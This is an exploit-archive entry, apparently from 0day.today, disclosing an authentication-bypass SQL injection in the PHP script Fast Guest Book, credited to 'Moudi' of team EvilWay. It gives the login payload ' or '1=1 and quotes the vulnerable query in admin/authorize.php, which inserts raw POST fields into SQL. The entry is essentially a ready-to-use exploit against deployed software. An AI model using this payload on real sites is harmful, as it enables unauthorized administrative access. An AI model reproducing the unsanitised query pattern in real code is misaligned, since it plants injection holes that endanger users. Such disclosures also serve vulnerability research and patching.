id: 4630
date: 01/11/2009
title: Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
author: Moudi
cves: 

=========================================================
Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
=========================================================


==============================================================================
    Fast Guest Book (Auth Bypass) SQL Injection Vulnerability
==============================================================================

	[»] Script:             [ Fast Guest Book ]
	[»] Language:           [ PHP ]
	[»] Website:            [ http://fastcreators.com/products/guestbook/download.php ]
	[»] Founder:            [ Moudi ]
        [»] Thanks to:          [ MiZoZ , ZuKa , and all hackers... ]
        [»] Team:               [ EvilWay ]

###########################################################################

===[ Exploit ]===	
	
	[»] ' or '1=1

===[ BUG ]===	

        [»] Bug In \admin\authorize.php

            $query = "select * from admin where userid='{$_POST['uname']}' AND
            pass='{$_POST['pass']}'";



Author: Moudi

###########################################################################




#  0day.today [2023-03-26]  #